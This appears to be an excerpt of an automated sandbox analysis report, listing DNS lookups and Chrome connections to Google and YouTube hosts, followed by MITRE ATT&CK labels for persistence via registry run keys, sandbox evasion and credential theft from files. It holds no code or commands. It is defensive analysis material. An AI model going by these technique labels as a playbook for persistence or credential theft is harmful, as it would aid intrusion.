DNS Response

216.58.204.78

216.58.212.238

142.250.180.14

142.250.178.14

142.250.200.14

172.217.16.238

142.250.200.46

216.58.212.206

142.250.187.238

216.58.201.110

172.217.169.46

142.250.187.206

142.250.179.238

DNS Request

78.204.58.216.in-addr.arpa

DNS Request

www.gstatic.com

DNS Response

216.58.212.195

DNS Request

www.google.com

DNS Response

142.250.187.196

DNS Request

74.204.58.216.in-addr.arpa

DNS Request

clients2.google.com

DNS Response

142.250.187.238

DNS Request

46.169.217.172.in-addr.arpa

DNS Request

22.236.111.52.in-addr.arpa
142.250.187.196:443

www.google.com

https

chrome.exe

3.9kB
9.3kB
10
11
8.8.8.8:53

99.201.58.216.in-addr.arpa

dns

283 B
604 B
4
4

DNS Request

99.201.58.216.in-addr.arpa

DNS Request

4.47.28.85.in-addr.arpa

DNS Request

beacons.gcp.gvt2.com

DNS Response

172.217.169.67

DNS Request

self.events.data.microsoft.com

DNS Response

20.189.173.6
142.250.187.238:443

clients2.google.com

https

chrome.exe

2.5kB
8.1kB
9
12
224.0.0.251:5353

chrome.exe

204 B
3
216.58.212.206:443

www.youtube.com

https

chrome.exe

2.9kB
7.2kB
5
8
172.217.169.46:443

www.youtube.com

https

chrome.exe

3.5kB
7.1kB
10
11
172.217.169.46:443

www.youtube.com

https

chrome.exe

4.9kB
7.7kB
10
12
216.58.212.206:443

www.youtube.com

https

chrome.exe

2.8kB
3.7kB
8
10

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

System Information Discovery

Virtualization/Sandbox Evasion